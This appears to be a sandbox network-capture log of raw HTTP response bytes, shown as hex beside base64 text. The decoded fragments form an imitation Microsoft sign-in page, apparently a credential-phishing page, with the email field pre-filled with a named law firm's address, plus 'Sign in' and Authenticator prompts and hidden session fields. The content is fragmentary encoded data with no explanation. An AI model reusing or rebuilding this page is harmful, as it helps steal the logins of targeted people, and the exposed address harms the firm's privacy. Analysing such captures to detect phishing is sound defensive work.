                                              2023-09-05 23:45:29 UTC717INData Raw: 58 4e 4e 51 7a 42 31 54 58 70 72 64 45 78 71 5a 33 68 4e 65 58 63 78 54 47 70 6a 4d 6b 39 44 64 7a 46 4d 61 6d 4d 79 54 30 4e 33 64 30 78 45 51 58 4e 4e 51 7a 42 34 54 47 70 52 4d 30 35 35 4d 48 56 4f 65 6c 6b 78 54 45 52 52 64 55 35 55 57 54 42 4d 52 46 46 31 54 6c 52 5a 4d 45 78 45 51 58 4e 4e 51 33 64 34 54 46 52 46 64 55 39 45 53 54 56 4d 56 45 56 31 54 57 70 46 65 6b 78 45 53 58 56 4f 61 6c 55 78 54 45 52 4a 64 55 35 71 56 54 46 4d 52 45 46 7a 54 55 4e 33 65 45 78 54 4e 44 46 4e 65 6d 74 30 54 56 4d 30 4d 30 31 55 54 58 4e 4e 61 54 51 7a 54 55 52 5a 63 30 31 70 4e 44 4e 4e 52 46 6c 7a 54 55 4e 33 64 30 78 45 52 58 4e 4e 55 7a 52 33 54 6d 70 4e 64 45 31 70 4e 48 6c 52 56 46 46 31 54 57 70 52 65 6b 78 45 55 58 56 4e 61 6c 46 36 54 45 52 42 63 30 31 44
                                              Data Ascii: XNNQzB1TXprdExqZ3hNeXcxTGpjMk9DdzFMamMyT0N3d0xEQXNNQzB4TGpRM055MHVOelkxTERRdU5UWTBMRFF1TlRZMExEQXNNQ3d4TFRFdU9ESTVMVEV1TWpFekxESXVOalUxTERJdU5qVTFMREFzTUN3eExTNDFNemt0TVM0M01UTXNNaTQzTURZc01pNDNNRFlzTUN3d0xERXNNUzR3TmpNdE1pNHlRVFF1TWpRekxEUXVNalF6TERBc01D
                                              2023-09-05 23:45:29 UTC725INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC725INData Raw: 31 66 34 30 0d 0a 39 49 6e 4a 32 5a 47 68 32 4e 44 51 7a 5a 47 51 69 49 47 6c 6b 50 53 4a 6c 62 57 46 70 62 43 49 67 59 32 78 68 63 33 4d 39 49 6d 5a 76 63 6d 30 74 59 32 39 75 64 48 4a 76 62 43 42 73 64 48 4a 66 62 33 5a 6c 63 6e 4a 70 5a 47 55 69 49 48 5a 68 62 48 56 6c 50 53 4a 76 5a 6d 5a 70 59 32 56 41 5a 47 6c 73 62 47 39 75 62 47 46 33 4c 6d 4e 76 4c 6e 56 72 49 69 42 77 62 47 46 6a 5a 57 68 76 62 47 52 6c 63 6a 30 69 63 32 39 74 5a 57 39 75 5a 55 42 6c 65 47 46 74 63 47 78 6c 4c 6d 4e 76 62 53 41 69 50 67 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 50 43 39 6b 61 58 59 2b 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67
                                              Data Ascii: 1f409InJ2ZGh2NDQzZGQiIGlkPSJlbWFpbCIgY2xhc3M9ImZvcm0tY29udHJvbCBsdHJfb3ZlcnJpZGUiIHZhbHVlPSJvZmZpY2VAZGlsbG9ubGF3LmNvLnVrIiBwbGFjZWhvbGRlcj0ic29tZW9uZUBleGFtcGxlLmNvbSAiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+DQogICAgICAgICAgICAg
                                              2023-09-05 23:45:29 UTC733INData Raw: 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 44 78 69 64 58 52 30 62 32 34 67 59 32 78 68 63 33 4d 39 49 6d 35 6c 65 48 52 69 49 47 4a 30 62 69 42 69 64 47 34 74 59 6d 78 76 59 32 73 67 59 6e 52 75 4c 58 42 79 61 57 31 68 63 6e 6b 67 59 6e 52 75 4c 58 4e 70 5a 32 35 70 62 69 49 2b 55 32 6c 6e 62 69 42 70 62 6a 77 76 59 6e 56 30 64 47 39 75 50 67 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67
                                              Data Ascii: CAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9Im5leHRiIGJ0biBidG4tYmxvY2sgYnRuLXByaW1hcnkgYnRuLXNpZ25pbiI+U2lnbiBpbjwvYnV0dG9uPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
                                              2023-09-05 23:45:29 UTC741INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC741INData Raw: 31 66 34 30 0d 0a 36 4e 44 68 6a 52 30 59 77 59 55 4e 43 61 31 42 54 53 6b 35 4e 65 6d 64 7a 54 58 70 43 56 30 31 55 53 6b 6c 4e 56 45 4a 58 54 58 70 43 62 30 35 49 57 54 42 4d 61 6c 55 7a 54 30 56 33 65 45 39 44 4e 44 46 4f 65 6d 64 7a 54 58 70 43 53 55 31 36 61 45 35 4e 56 45 6c 7a 54 58 70 4b 53 55 39 47 57 58 68 4e 52 57 63 77 54 55 5a 5a 65 6b 31 72 5a 33 68 50 55 7a 51 77 54 57 70 4b 54 55 31 55 53 58 4e 4e 65 6d 74 31 54 6b 52 4a 65 56 64 70 53 57 64 61 62 57 78 7a 59 6b 51 77 61 55 6c 36 55 58 64 4f 52 45 45 77 54 55 4e 4a 64 6c 42 71 64 33 5a 6a 4d 31 70 75 55 47 63 39 50 53 49 2b 50 43 45 74 4c 53 41 76 61 32 38 67 4c 53 30 2b 44 51 6f 38 49 53 30 74 49 43 39 72 62 79 41 74 4c 54 34 38 49 53 30 74 49 43 39 72 62 79 41 74 4c 54 34 4e 43 6a 77 68
                                              Data Ascii: 1f406NDhjR0YwYUNCa1BTSk5NemdzTXpCV01USklNVEJXTXpCb05IWTBMalUzT0V3eE9DNDFOemdzTXpCSU16aE5NVElzTXpKSU9GWXhNRWcwTUZZek1rZ3hPUzQwTWpKTU1USXNNemt1TkRJeVdpSWdabWxzYkQwaUl6UXdOREEwTUNJdlBqd3ZjM1puUGc9PSI+PCEtLSAva28gLS0+DQo8IS0tIC9rbyAtLT48IS0tIC9rbyAtLT4NCjwh
                                              2023-09-05 23:45:29 UTC749INData Raw: 32 39 75 51 32 78 70 59 32 73 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 63 32 56 6a 62 32 35 6b 59 58 4a 35 51 6e 56 30 64 47 39 75 51 32 78 70 59 32 73 36 49 48 4e 6c 59 32 39 75 5a 47 46 79 65 55 4a 31 64 48 52 76 62 6c 39 76 62 6b 4e 73 61 57 4e 72 49 48 30 67 66 53 49 2b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 59 32 39 73 4c 58 68 7a 4c 54 49 30 49 47 35 76 4c 58 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 43 31 79 61 57 64 6f 64 43 42 69 64 58 52 30 62 32 34 74 59 32 39 75 64 47 46 70 62 6d 56 79 49 47 35 76 4c 57 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 69 49 47 52 68 64 47 45 74 59 6d 6c 75 5a 44 30 69 44 51 6f 67 49 43 41 67 64 6d 6c 7a 61 57 4a 73 5a 54 6f 67 61 58 4e 51 63 6d 6c 74 59 58 4a 35
                                              Data Ascii: 29uQ2xpY2ssDQogICAgICAgICAgICAgICAgc2Vjb25kYXJ5QnV0dG9uQ2xpY2s6IHNlY29uZGFyeUJ1dHRvbl9vbkNsaWNrIH0gfSI+PGRpdiBjbGFzcz0iY29sLXhzLTI0IG5vLXBhZGRpbmctbGVmdC1yaWdodCBidXR0b24tY29udGFpbmVyIG5vLW1hcmdpbi1ib3R0b20iIGRhdGEtYmluZD0iDQogICAgdmlzaWJsZTogaXNQcmltYXJ5
                                              2023-09-05 23:45:29 UTC756INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC756INData Raw: 31 66 34 30 0d 0a 69 5a 6d 46 73 63 32 55 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 62 6d 46 74 5a 54 30 69 63 6d 56 78 64 57 56 7a 64 43 49 67 5a 47 46 30 59 53 31 69 61 57 35 6b 50 53 4a 32 59 57 78 31 5a 54 6f 67 63 33 5a 79 4c 6e 4e 44 64 48 67 69 49 48 5a 68 62 48 56 6c 50 53 4a 79 55 56 46 4a 51 56 4a 42 51 57 68 57 54 54 6c 69 54 30 35 72 52 30 6b 32 56 45 35 78 55 6c 4a 44 4e 6c 67 34 4e 6b 35 6e 63 56 56 54 55 6a 42 33 63 32 35 75 5a 6a 64 7a 55 7a 42 31 56 33 5a 6b 64 45 78 5a 53 6e 46 75 56 46 39 45 51 6b 56 75 58 7a 4e 61 61 6e 5a 66 56 48 68 4a 62 6e 4a 69 52 45 4e 34 56 56 52 48 51 57 52 42 55 45 52 45 55 58 6c 57 56 30 70 42 55 58 46 43 54 6d 6c 52 57 46 45 32 61 57 45 7a 59 32 68 43
                                              Data Ascii: 1f40iZmFsc2UiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icmVxdWVzdCIgZGF0YS1iaW5kPSJ2YWx1ZTogc3ZyLnNDdHgiIHZhbHVlPSJyUVFJQVJBQWhWTTliT05rR0k2VE5xUlJDNlg4Nk5ncVVTUjB3c25uZjdzUzB1V3ZkdExZSnFuVF9EQkVuXzNaanZfVHhJbnJiREN4VVRHQWRBUEREUXlWV0pBUXFCTmlRWFE2aWEzY2hC
                                              2023-09-05 23:45:29 UTC764INData Raw: 45 4e 44 58 30 52 6c 63 32 4e 79 61 58 42 30 61 57 39 75 49 47 6c 6b 55 33 42 68 62 6c 39 54 51 55 39 55 51 30 4e 66 52 58 4a 79 62 33 4a 66 54 31 52 44 4a 79 42 39 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6a 63 33 4d 36 49 48 73 67 4a 32 68 68 63 79 31 6c 63 6e 4a 76 63 69 63 36 49 47 56 79 63 6d 39 79 49 48 30 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 52 6c 65 48 52 4a 62 6e 42 31 64 44 6f 67 62 33 52 6a 53 57 35 77 64 58 52 55 5a 58 68 30 59 6d 39 34 4c 6e 5a 68 62 48 56 6c 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 68 63 6d 6c 68 54 47 46 69 5a 57 77 36 49 48 4e 30 63 6c 73 6e 51 31 52 66 55 30 46 50
                                              Data Ascii: ENDX0Rlc2NyaXB0aW9uIGlkU3Bhbl9TQU9UQ0NfRXJyb3JfT1RDJyB9LA0KICAgICAgICAgICAgICAgICAgICBjc3M6IHsgJ2hhcy1lcnJvcic6IGVycm9yIH0sDQogICAgICAgICAgICAgICAgICAgIHRleHRJbnB1dDogb3RjSW5wdXRUZXh0Ym94LnZhbHVlLA0KICAgICAgICAgICAgICAgICAgICBhcmlhTGFiZWw6IHN0clsnQ1RfU0FP
                                              2023-09-05 23:45:29 UTC772INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC772INData Raw: 31 66 34 30 0d 0a 70 49 44 30 39 50 53 41 6b 61 57 35 6b 5a 58 67 6f 4b 53 41 74 4c 54 34 38 49 53 30 74 49 43 39 72 62 79 41 74 4c 54 34 4e 43 69 41 67 49 43 41 67 49 43 41 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 38 49 53 30 74 49 47 74 76 49 47 6c 6d 4f 69 41 6b 63 47 46 79 5a 57 35 30 4c 6d 4e 31 63 6e 4a 6c 62 6e 52 57 61 57 56 33 53 57 35 6b 5a 58 67 6f 4b 53 41 39 50 54 30 67 4a 47 6c 75 5a 47 56 34 4b 43 6b 67 4c 53 30 2b 50 43 45 74 4c 53 41 76 61 32 38 67 4c 53 30 2b 44 51 6f 67 49 43 41 67 49 43 41 67 49 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 50 43 45 74 4c 53 42 72 62 79 42 70 5a 6a 6f 67 4a 48 42 68 63 6d 56 75 64 43 35 6a 64 58 4a 79 5a 57 35 30 56 6d 6c 6c 64 30 6c 75 5a 47 56 34 4b 43 6b 67 50 54 30 39
                                              Data Ascii: 1f40pID09PSAkaW5kZXgoKSAtLT48IS0tIC9rbyAtLT4NCiAgICAgICAgDQogICAgICAgICAgICA8IS0tIGtvIGlmOiAkcGFyZW50LmN1cnJlbnRWaWV3SW5kZXgoKSA9PT0gJGluZGV4KCkgLS0+PCEtLSAva28gLS0+DQogICAgICAgIA0KICAgICAgICAgICAgPCEtLSBrbyBpZjogJHBhcmVudC5jdXJyZW50Vmlld0luZGV4KCkgPT09
                                              2023-09-05 23:45:29 UTC780INData Raw: 69 41 68 63 33 5a 79 4c 6d 5a 49 59 58 4e 43 59 57 4e 72 5a 33 4a 76 64 57 35 6b 51 32 39 73 62 33 49 70 4b 53 41 6d 4a 69 41 68 61 58 4e 49 61 57 64 6f 51 32 39 75 64 48 4a 68 63 33 52 43 62 47 46 6a 61 31 52 6f 5a 57 31 6c 49 43 30 74 50 67 30 4b 50 43 45 74 4c 53 42 72 62 79 42 30 5a 57 31 77 62 47 46 30 5a 54 6f 67 65 79 42 75 62 32 52 6c 63 7a 6f 67 57 32 52 68 63 6d 74 4a 62 57 46 6e 5a 55 35 76 5a 47 56 64 4c 43 42 6b 59 58 52 68 4f 69 41 6b 63 47 46 79 5a 57 35 30 49 48 30 67 4c 53 30 2b 50 47 6c 74 5a 79 42 6a 62 47 46 7a 63 7a 30 69 64 47 6c 73 5a 53 31 70 62 57 63 67 63 32 31 68 62 47 77 69 49 48 4a 76 62 47 55 39 49 6e 42 79 5a 58 4e 6c 62 6e 52 68 64 47 6c 76 62 69 49 67 63 47 35 6e 63 33 4a 6a 50 53 4a 6b 59 58 52 68 4f 6d 6c 74 59 57 64 6c
                                              Data Ascii: iAhc3ZyLmZIYXNCYWNrZ3JvdW5kQ29sb3IpKSAmJiAhaXNIaWdoQ29udHJhc3RCbGFja1RoZW1lIC0tPg0KPCEtLSBrbyB0ZW1wbGF0ZTogeyBub2RlczogW2RhcmtJbWFnZU5vZGVdLCBkYXRhOiAkcGFyZW50IH0gLS0+PGltZyBjbGFzcz0idGlsZS1pbWcgc21hbGwiIHJvbGU9InByZXNlbnRhdGlvbiIgcG5nc3JjPSJkYXRhOmltYWdl
                                              2023-09-05 23:45:29 UTC788INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC788INData Raw: 31 66 34 30 0d 0a 7a 64 48 6c 73 5a 54 30 69 5a 47 6c 7a 63 47 78 68 65 54 70 75 62 32 35 6c 4f 79 49 2b 44 51 6f 4a 43 51 6b 4a 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 38 49 53 30 74 49 47 74 76 49 47 6c 6d 4f 69 42 6c 63 6e 4a 76 63 69 41 74 4c 54 34 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 44 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 4a 76 64 79 49 2b 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 50 47 52 70 64 69 42 70 5a 44 30 69 61 57 52 45 61 58 5a 66 55 30 46 50 56 45 4e 44 58 30 56 79 63 6d 39 79 54 58 4e 6e 58 30 39 55 51 79 49 67 59 32 78 68 63 33 4d 39 49 6d 46 73 5a 58 4a 30 49 47 46 73 5a 58 4a 30 4c 57 56 79 63 6d 39 79 49 47 5a 70 63 6e 4e 30 49 6a 34 4e 43 69 41 67 49 43 41 67
                                              Data Ascii: 1f40zdHlsZT0iZGlzcGxheTpub25lOyI+DQoJCQkJDQogICAgICAgICAgICA8IS0tIGtvIGlmOiBlcnJvciAtLT4NCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InJvdyI+DQogICAgICAgICAgICAgICAgPGRpdiBpZD0iaWREaXZfU0FPVENDX0Vycm9yTXNnX09UQyIgY2xhc3M9ImFsZXJ0IGFsZXJ0LWVycm9yIGZpcnN0Ij4NCiAgICAg
                                              2023-09-05 23:45:29 UTC796INData Raw: 79 41 68 64 48 64 76 56 32 46 35 55 47 39 73 62 47 6c 75 5a 30 35 6c 5a 57 52 6c 5a 43 41 6d 59 57 31 77 4f 79 5a 68 62 58 41 37 49 43 46 6f 61 57 52 6c 53 57 35 77 64 58 52 44 62 32 35 30 63 6d 39 73 63 79 67 70 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 4e 6c 59 32 39 75 5a 47 46 79 65 55 4a 31 64 48 52 76 62 6b 52 6c 63 32 4e 79 61 57 4a 6c 5a 45 4a 35 4f 69 41 6f 63 33 5a 79 4c 6d 5a 54 61 47 39 33 51 6e 56 30 64 47 39 75 63 79 41 6d 59 57 31 77 4f 79 5a 68 62 58 41 37 49 48 52 33 62 31 64 68 65 56 42 76 62 47 78 70 62 6d 64 4f 5a 57 56 6b 5a 57 51 70 49 44 38 67 4a 32 6c 6b 52 47 6c 32 58 31 4e 42 54 31 52 44 51 31 39 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 63 67 4f 69 42 75 64 57 78 73 49 48 30 73 44 51 6f 67
                                              Data Ascii: yAhdHdvV2F5UG9sbGluZ05lZWRlZCAmYW1wOyZhbXA7ICFoaWRlSW5wdXRDb250cm9scygpLA0KICAgICAgICAgICAgICAgIHNlY29uZGFyeUJ1dHRvbkRlc2NyaWJlZEJ5OiAoc3ZyLmZTaG93QnV0dG9ucyAmYW1wOyZhbXA7IHR3b1dheVBvbGxpbmdOZWVkZWQpID8gJ2lkRGl2X1NBT1RDQ19EZXNjcmlwdGlvbicgOiBudWxsIH0sDQog
                                              2023-09-05 23:45:29 UTC803INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC803INData Raw: 31 66 34 30 0d 0a 6b 62 44 4a 33 65 6e 56 77 51 54 6c 4b 56 56 6c 36 61 6d 4a 54 54 6c 42 55 62 47 39 4d 4d 47 56 56 53 6d 4a 6a 53 6e 52 73 4c 58 6c 42 61 47 4e 69 64 31 45 7a 63 6e 46 76 54 33 68 4e 62 6d 39 6f 54 57 56 5a 4d 32 35 79 61 55 56 42 52 56 38 31 59 32 31 61 56 6e 67 78 4e 46 6c 55 54 6c 6c 42 52 6e 42 6d 56 54 6c 58 4d 56 70 69 56 55 56 77 59 57 46 4d 57 47 64 66 56 54 5a 71 56 6e 46 61 64 48 52 70 57 54 45 31 5a 6c 4e 77 55 56 6c 6f 53 47 64 4f 54 6a 49 79 52 46 52 68 62 6d 38 78 51 55 31 5a 4d 57 31 72 63 56 4e 69 56 54 56 72 4f 46 6c 59 64 57 5a 6b 5a 6c 45 74 4f 45 74 66 65 58 46 59 4d 33 70 5a 4c 55 52 43 4e 32 35 45 61 44 4a 68 4e 46 52 45 54 30 31 47 52 45 31 34 61 33 6c 56 63 45 63 77 59 30 35 59 51 6b 39 53 64 30 5a 45 56 7a 5a 55
                                              Data Ascii: 1f40kbDJ3enVwQTlKVVl6amJTTlBUbG9MMGVVSmJjSnRsLXlBaGNid1EzcnFvT3hNbm9oTWVZM25yaUVBRV81Y21aVngxNFlUTllBRnBmVTlXMVpiVUVwYWFMWGdfVTZqVnFadHRpWTE1ZlNwUVloSGdOTjIyRFRhbm8xQU1ZMW1rcVNiVTVrOFlYdWZkZlEtOEtfeXFYM3pZLURCN25EaDJhNFRET01GRE14a3lVcEcwY05YQk9Sd0ZEVzZU
                                              2023-09-05 23:45:29 UTC811INData Raw: 79 64 70 5a 45 52 70 64 6c 39 53 61 57 4e 6f 51 32 39 75 64 47 56 34 64 46 39 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 64 64 49 44 6f 67 57 31 30 70 4c 6d 70 76 61 57 34 6f 4a 79 41 6e 4b 53 42 39 49 48 30 69 50 6a 78 68 49 47 68 79 5a 57 59 39 49 69 4d 69 49 47 6c 6b 50 53 4a 7a 61 57 64 75 53 57 35 42 62 6d 39 30 61 47 56 79 56 32 46 35 49 69 42 68 63 6d 6c 68 4c 57 52 6c 63 32 4e 79 61 57 4a 6c 5a 47 4a 35 50 53 4a 70 5a 45 52 70 64 6c 39 54 51 55 39 55 51 30 46 54 58 31 52 70 64 47 78 6c 49 47 6c 6b 52 47 6c 32 58 31 4e 42 54 31 52 44 51 56 4e 66 52 47 56 7a 59 33 4a 70 63 48 52 70 62 32 34 69 50 6b 6b 67 59 32 46 75 4a 33 51 67 64 58 4e 6c 49 47 31 35 49 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 42 64 58 52 6f 5a 57 35 30 61 57 4e 68 64 47 39 79
                                              Data Ascii: ydpZERpdl9SaWNoQ29udGV4dF9EZXNjcmlwdGlvbiddIDogW10pLmpvaW4oJyAnKSB9IH0iPjxhIGhyZWY9IiMiIGlkPSJzaWduSW5Bbm90aGVyV2F5IiBhcmlhLWRlc2NyaWJlZGJ5PSJpZERpdl9TQU9UQ0FTX1RpdGxlIGlkRGl2X1NBT1RDQVNfRGVzY3JpcHRpb24iPkkgY2FuJ3QgdXNlIG15IE1pY3Jvc29mdCBBdXRoZW50aWNhdG9y
                                              2023-09-05 23:45:29 UTC819INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC819INData Raw: 31 66 34 30 0d 0a 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4f 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6a 59 57 35 6a 5a 57 77 36 49 48 5a 70 5a 58 64 66 62 32 35 44 59 57 35 6a 5a 57 77 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 31 63 47 52 68 64 47 56 54 5a 58 4e 7a 61 57 39 75 53 57 52 6c 62 6e 52 70 5a 6d 6c 6c 63 6a 6f 67 4a 48 52 6d 59 56 42 68 5a 32 55 75 64 6d 6c 6c 64 31 39 76 62 6c 56 77 5a 47 46 30 5a 56 4e 6c 63 33 4e 70 62 32 35 4a 5a 47 56 75 64 47 6c 6d 61 57 56 79 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67
                                              Data Ascii: 1f40gICAgICAgICAgICAgIGV2ZW50OiB7DQogICAgICAgICAgICAgICAgICAgICAgICBjYW5jZWw6IHZpZXdfb25DYW5jZWwsDQogICAgICAgICAgICAgICAgICAgICAgICB1cGRhdGVTZXNzaW9uSWRlbnRpZmllcjogJHRmYVBhZ2Uudmlld19vblVwZGF0ZVNlc3Npb25JZGVudGlmaWVyLA0KICAgICAgICAgICAgICAgICAgICAgICAg
                                              2023-09-05 23:45:29 UTC827INData Raw: 67 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 38 5a 47 6c 32 49 48 4e 30 65 57 78 6c 50 53 49 69 49 47 6c 6b 50 53 4a 70 5a 45 52 70 64 6c 39 54 51 55 39 55 51 31 4e 66 53 47 46 32 61 57 35 6e 56 48 4a 76 64 57 4a 73 5a 53 49 67 59 32 78 68 63 33 4d 39 49 6d 5a 76 63 6d 30 74 5a 33 4a 76 64 58 41 69 49 47 52 68 64 47 45 74 59 6d 6c 75 5a 44 30 69 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 33 4e 7a 4f 69 42 37 49 43 64 75 62 79 31 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4a 7a 6f 67 49 58 4e 32 63 69 35 31 63 6d 78 4e 62 33 4a 6c 53 57 35 6d 62 79 42 39 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67
                                              Data Ascii: g0KICAgICAgICAgICAgICAgICAgICA8ZGl2IHN0eWxlPSIiIGlkPSJpZERpdl9TQU9UQ1NfSGF2aW5nVHJvdWJsZSIgY2xhc3M9ImZvcm0tZ3JvdXAiIGRhdGEtYmluZD0iDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgY3NzOiB7ICduby1tYXJnaW4tYm90dG9tJzogIXN2ci51cmxNb3JlSW5mbyB9LA0KICAgICAgICAgICAgICAg
                                              2023-09-05 23:45:29 UTC835INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC835INData Raw: 31 66 34 30 0d 0a 6f 59 58 4a 6c 5a 45 52 68 64 47 45 75 5a 6d 78 76 64 31 52 76 61 32 56 75 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 63 32 56 7a 63 32 6c 76 62 6b 46 77 63 48 4a 76 64 6d 46 73 52 58 4a 79 62 33 49 36 49 48 4e 6f 59 58 4a 6c 5a 45 52 68 64 47 45 75 63 32 56 7a 63 32 6c 76 62 6b 46 77 63 48 4a 76 64 6d 46 73 52 58 4a 79 62 33 49 67 66 53 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 5a 58 5a 6c 62 6e 51 36 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 4e 68 62 6d 4e 6c 62 44 6f 67 64 6d 6c 6c 64 31 39 76 62 6b 4e 68 62 6d 4e 6c 62 43 77 4e 43 69 41 67 49 43 41 67
                                              Data Ascii: 1f40oYXJlZERhdGEuZmxvd1Rva2VuLA0KICAgICAgICAgICAgICAgICAgICAgICAgc2Vzc2lvbkFwcHJvdmFsRXJyb3I6IHNoYXJlZERhdGEuc2Vzc2lvbkFwcHJvdmFsRXJyb3IgfSwNCiAgICAgICAgICAgICAgICAgICAgZXZlbnQ6IHsNCiAgICAgICAgICAgICAgICAgICAgICAgIGNhbmNlbDogdmlld19vbkNhbmNlbCwNCiAgICAg
                                              2023-09-05 23:45:29 UTC843INData Raw: 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 64 6d 46 73 64 57 55 36 49 48 42 79 61 57 31 68 63 6e 6c 43 64 58 52 30 62 32 35 55 5a 58 68 30 4b 43 6b 67 66 48 77 67 63 33 52 79 57 79 64 44 56 46 39 51 56 30 52 66 55 31 52 53 58 31 4e 70 5a 32 35 4a 62 6c 39 43 64 58 52 30 62 32 35 66 54 6d 56 34 64 43 64 64 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 68 68 63 30 5a 76 59 33 56 7a 4f 69 42 6d 62 32 4e 31 63 30 39 75 55 48 4a 70 62 57 46 79 65 55 4a 31 64 48 52 76 62 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6a 62 47 6c 6a 61 7a 6f 67 63 48 4a 70 62 57 46 79 65 55 4a 31 64 48 52 76 62 6c 39 76 62 6b 4e 73 61 57 4e 72 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 67
                                              Data Ascii: QogICAgICAgICAgICAgICAgdmFsdWU6IHByaW1hcnlCdXR0b25UZXh0KCkgfHwgc3RyWydDVF9QV0RfU1RSX1NpZ25Jbl9CdXR0b25fTmV4dCddLA0KICAgICAgICAgICAgICAgIGhhc0ZvY3VzOiBmb2N1c09uUHJpbWFyeUJ1dHRvbiwNCiAgICAgICAgICAgICAgICBjbGljazogcHJpbWFyeUJ1dHRvbl9vbkNsaWNrLA0KICAgICAgICAg
                                              2023-09-05 23:45:29 UTC850INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC850INData Raw: 31 66 34 30 0d 0a 6d 61 57 78 73 50 53 4a 79 5a 32 49 6f 4d 54 67 73 4e 54 6b 73 4d 54 41 35 4b 53 49 67 63 33 52 79 62 32 74 6c 50 53 4a 75 62 32 35 6c 49 69 42 7a 64 48 4a 76 61 32 55 74 64 32 6c 6b 64 47 67 39 49 6a 45 69 50 6a 77 76 63 47 46 30 61 44 34 38 4c 32 63 2b 50 43 39 6e 50 6a 78 6e 49 47 6c 6b 50 53 4a 73 62 32 46 6b 61 57 35 6e 54 47 39 6e 62 7a 63 69 49 47 4e 73 61 58 41 74 63 47 46 30 61 44 30 69 64 58 4a 73 4b 43 4e 73 62 32 46 6b 61 57 35 6e 54 47 39 6e 62 7a 49 79 4b 53 49 2b 50 47 63 67 61 57 51 39 49 6d 78 76 59 57 52 70 62 6d 64 4d 62 32 64 76 4f 46 39 30 63 79 49 67 64 48 